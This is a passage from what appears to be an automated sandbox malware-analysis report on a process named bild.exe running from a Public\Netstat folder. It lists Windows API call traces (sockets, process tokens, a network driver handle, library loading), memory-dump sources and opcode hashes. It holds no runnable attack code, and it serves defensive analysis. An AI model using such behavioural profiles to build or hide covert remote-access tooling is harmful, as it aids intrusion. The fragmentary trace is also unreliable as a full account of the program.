                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseHandle$FreeLibraryObjectSingleWait
                                                                                          • String ID:
                                                                                          • API String ID: 1314093303-0
                                                                                          • Opcode ID: 7d2e314c4a79abf06013014507abe82da34b4e69185c6a4a9ad4d68e1235ff59
                                                                                          • Instruction ID: 8e76f7fb4e107f93cb89770177b2081f40004907d07b5dfd0c3c9c847909df3d
                                                                                          • Opcode Fuzzy Hash: 7d2e314c4a79abf06013014507abe82da34b4e69185c6a4a9ad4d68e1235ff59
                                                                                          • Instruction Fuzzy Hash: A7F08135E1425ADFE714DF60D889BADF774FB88319F0002A9D82A52180DF355940CB50
                                                                                          APIs
                                                                                          • ioctlsocket.WSOCK32(939E34B3,4004667F,00000000,a3^l), ref: 6C5D5D1F
                                                                                          • select.WSOCK32(00000001,?,00000000,?,00000000,939E34B3,4004667F,00000000,a3^l), ref: 6C5D5D62
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ioctlsocketselect
                                                                                          • String ID: a3^l
                                                                                          • API String ID: 1457273030-3838789914
                                                                                          • Opcode ID: 358081ceb7d0a1c4800ffff39fb90aaee65c8c98909374f7e997905dfc459040
                                                                                          • Instruction ID: 1ce468167fe70463d1bb97893f50ce00efcffce07f53c34d7d8f41d98ebfc4fe
                                                                                          • Opcode Fuzzy Hash: 358081ceb7d0a1c4800ffff39fb90aaee65c8c98909374f7e997905dfc459040
                                                                                          • Instruction Fuzzy Hash: 4B213370A013188BEB28DF18CD547DDB7B9EF84304F4081DAA80957681D7705F95DF90
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Netstat\bild.exe,00000104,?,11143E73,?), ref: 11143C49
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CurrentFileModuleNameProcess
                                                                                          • String ID: C:\Users\Public\Netstat\bild.exe
                                                                                          • API String ID: 2251294070-3316297413
                                                                                          • Opcode ID: 723324e2a123dfbea80ddcbfb8a880b064ecb9608f963ee43b1e571dd00f4a9e
                                                                                          • Instruction ID: b9aa28b4973dc8f7500fb142756b1fa860f28402029a3e5f5efe4e67c4e883a6
                                                                                          • Opcode Fuzzy Hash: 723324e2a123dfbea80ddcbfb8a880b064ecb9608f963ee43b1e571dd00f4a9e
                                                                                          • Instruction Fuzzy Hash: F811E7747282235BE7149F76C994719F7A5AB40B5DF20403EE819C76C4DB71F845C744
                                                                                          APIs
                                                                                          • _malloc.LIBCMT ref: 1110F4A9
                                                                                            • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                            • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                            • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                          • _memset.LIBCMT ref: 1110F4D2
                                                                                            • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                            • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                            • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                            • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocateErrorExitHeapLastMessageProcess_malloc_memsetwsprintf
                                                                                          • String ID: ..\ctl32\Refcount.cpp
                                                                                          • API String ID: 2803934178-2363596943
                                                                                          • Opcode ID: 1dad7423e7d09c371aaf82e5f4f0c79299b8a2cfda0255715acc90ffe98602aa
                                                                                          • Instruction ID: 747f5be640ff5df7f7be77ac0748be8e5b1ae2afb2ba592a3adef8646797d69b
                                                                                          • Opcode Fuzzy Hash: 1dad7423e7d09c371aaf82e5f4f0c79299b8a2cfda0255715acc90ffe98602aa
                                                                                          • Instruction Fuzzy Hash: B5E0C23AE4013933C112258A2C03FDBF69C8BD19FCF060021FE0CAA201E586B55181E6
                                                                                          APIs
                                                                                          • CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000,00000001,1102EFB6,MiniDumpType,000000FF,00000000,00000000,?,?,View), ref: 11014FE7
                                                                                          • CloseHandle.KERNEL32(00000000,?,?,View,Client,Bridge), ref: 11014FF8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseCreateFileHandle
                                                                                          • String ID: \\.\NSWFPDrv
                                                                                          • API String ID: 3498533004-85019792
                                                                                          • Opcode ID: f0badf7843dd101c9c7a596aad23f33c11cadc83e0c29f65da520d4fe63b43e1
                                                                                          • Instruction ID: 0b573536b28af4079515d3142ca801f5deca53cbeb6a996f0a1660ae0aa1d84a
                                                                                          • Opcode Fuzzy Hash: f0badf7843dd101c9c7a596aad23f33c11cadc83e0c29f65da520d4fe63b43e1
                                                                                          • Instruction Fuzzy Hash: A9D0C971A051387AF23416B66C4CFC7AD09DF06BB5F210264B53DE11D886104C41C2F1
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _calloc
                                                                                          • String ID:
                                                                                          • API String ID: 1679841372-0
                                                                                          • Opcode ID: 9cedd041eecb3df7698fbc33d80b44fc007d69f78d2f5524ab9bd2bf2492814b
                                                                                          • Instruction ID: 0024421513bb2e1abb717dbf2ce3cdefbb73aa1ee3cdb3a5feae03928f974db8
                                                                                          • Opcode Fuzzy Hash: 9cedd041eecb3df7698fbc33d80b44fc007d69f78d2f5524ab9bd2bf2492814b
                                                                                          • Instruction Fuzzy Hash: 8C519E7560020AAFDB50CF68CC81FAAB7A6FF8A704F148459F929DB280D771E901CF95
                                                                                          APIs
                                                                                          • _memset.LIBCMT ref: 6C5D8FE4
                                                                                          • getsockname.WSOCK32(?,?,00000010,?,03682EB0,?), ref: 6C5D9005
                                                                                          • WSAGetLastError.WSOCK32(?,?,00000010,?,03682EB0,?), ref: 6C5D902E
                                                                                            • Part of subcall function 6C5D5840: inet_ntoa.WSOCK32(00000080,?,00000000,?,6C5D8F91,00000000,00000000,6C61B8DA,?,00000080), ref: 6C5D5852
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast_memsetgetsocknameinet_ntoa
                                                                                          • String ID:
                                                                                          • API String ID: 3066294524-0
                                                                                          • Opcode ID: dd29d924ea5789e5c8a4c51635ed0a87f0c0d647ba8196720499a5bbafbc1bab
                                                                                          • Instruction ID: e89b7acffd834b5c6dc0d878bfb8d5a1f452ac72541fb4dbe9261f2be5f4a8f5
                                                                                          • Opcode Fuzzy Hash: dd29d924ea5789e5c8a4c51635ed0a87f0c0d647ba8196720499a5bbafbc1bab
                                                                                          • Instruction Fuzzy Hash: 751151B1E00108AFCB04DFA9DC419FFB7B8EB88214F01456ADC15E7240E770AE158B91
                                                                                          APIs
                                                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111145A
                                                                                          • __wsplitpath.LIBCMT ref: 11111475
                                                                                            • Part of subcall function 11169044: __splitpath_helper.LIBCMT ref: 11169086
                                                                                          • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111114A9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DirectoryInformationSystemVolume__splitpath_helper__wsplitpath
                                                                                          • String ID:
                                                                                          • API String ID: 1847508633-0
                                                                                          • Opcode ID: 7498e584b69856d4904a5e87c0faea6464729445070a8fc0c411536d822b12a4
                                                                                          • Instruction ID: 71a9510f599fa1c136cb45ff21797ad5c5790827a759e4d2b52c0b71367846c8
                                                                                          • Opcode Fuzzy Hash: 7498e584b69856d4904a5e87c0faea6464729445070a8fc0c411536d822b12a4
                                                                                          • Instruction Fuzzy Hash: 34116175A4021DABEB14DF94CD42FE9F378AB48B04F404199E7246B1C0E7B12A48CB65
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA01
                                                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA08
                                                                                            • Part of subcall function 1109E910: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,1102FCB2,?,00000000), ref: 1109E948
                                                                                            • Part of subcall function 1109E910: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109E964
                                                                                            • Part of subcall function 1109E910: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,0106F958,0106F958,0106F958,0106F958,0106F958,0106F958,0106F958,111EEB64,?,00000001,00000001), ref: 1109E990
                                                                                            • Part of subcall function 1109E910: EqualSid.ADVAPI32(?,0106F958,?,00000001,00000001), ref: 1109E9A3
                                                                                          • CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1109EA27
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
                                                                                          • String ID:
                                                                                          • API String ID: 2256153495-0
                                                                                          • Opcode ID: 3278d9adbe4d3509b3b3548b9dad78e2718189f4cc0d765404142b0664a012dd
                                                                                          • Instruction ID: 36b54363b319bb335bc5da0d0e9bdd0405b18079b131e91390d3ecc07929186c
                                                                                          • Opcode Fuzzy Hash: 3278d9adbe4d3509b3b3548b9dad78e2718189f4cc0d765404142b0664a012dd
                                                                                          • Instruction Fuzzy Hash: DCF05E78A15328EFD709CFF5D88482EB7A9AF08208700447DF629D3205E631EE009F50
                                                                                          APIs
                                                                                          • InitializeCriticalSection.KERNEL32(111F0908,F3EE1E80,?,?,?,?,-00000001,11182078,000000FF,?,1110F7F8,00000001,?,11169683,?), ref: 1110F754
                                                                                          • EnterCriticalSection.KERNEL32(111F0908,F3EE1E80,?,?,?,?,-00000001,11182078,000000FF,?,1110F7F8,00000001,?,11169683,?), ref: 1110F770
                                                                                          • LeaveCriticalSection.KERNEL32(111F0908,?,?,?,?,-00000001,11182078,000000FF,?,1110F7F8,00000001,?,11169683,?), ref: 1110F7B8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$EnterInitializeLeave
                                                                                          • String ID:
                                                                                          • API String ID: 3991485460-0
                                                                                          • Opcode ID: de9cc3b242b9749762f72f1a9abe3d064888d8cc99300df6bb387b99347c91a8
                                                                                          • Instruction ID: 724175da6b3b5eb63f60f43096b8b9410b0df93e13cce3f4766159a849acac97
                                                                                          • Opcode Fuzzy Hash: de9cc3b242b9749762f72f1a9abe3d064888d8cc99300df6bb387b99347c91a8
                                                                                          • Instruction Fuzzy Hash: 3D11C675A0061AAFE700CF65CD85B5BF7A9FB88714F010129E829E3340F7359808CB92
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(00000000,00000000), ref: 11068A12
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad
                                                                                          • String ID: ??CTL32.DLL
                                                                                          • API String ID: 1029625771-2984404022
                                                                                          • Opcode ID: f114da26ba1a202df3ee97640f196ffb6169a957819133968d89773a25347f90
                                                                                          • Instruction ID: 38d720fc7c26638894156a2f8924bac31edb6b50614c34829f37a9a02c5b1e22
                                                                                          • Opcode Fuzzy Hash: f114da26ba1a202df3ee97640f196ffb6169a957819133968d89773a25347f90
                                                                                          • Instruction Fuzzy Hash: 5831F5B2A04781DFE711CF59DC40B5AF7E8FB45724F0482AAE92897380E735A900CB92
                                                                                          APIs
                                                                                          • inet_ntoa.WSOCK32(00000080,?,00000000,?,6C5D8F91,00000000,00000000,6C61B8DA,?,00000080), ref: 6C5D5852
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: inet_ntoa
                                                                                          • String ID: gfff
                                                                                          • API String ID: 1879540557-1553575800
                                                                                          • Opcode ID: 30d771e4efecf2de1b4b7cdfc7e46be8ffc974b213b36202af62f32905784b99
                                                                                          • Instruction ID: 477018614ad807c104869332b51e32acb4aac172d6e7d0a05e9ed5f9057b1eb7
                                                                                          • Opcode Fuzzy Hash: 30d771e4efecf2de1b4b7cdfc7e46be8ffc974b213b36202af62f32905784b99
                                                                                          • Instruction Fuzzy Hash: 611189326083D68BC3068A2EAC602D7BFD9DB86251B2D4569D8C9CB701C611E84AC7D0
                                                                                          APIs
                                                                                          • GetDriveTypeA.KERNEL32(?), ref: 11026B6D
                                                                                          Strings
                                                                                          Memory Dump Source
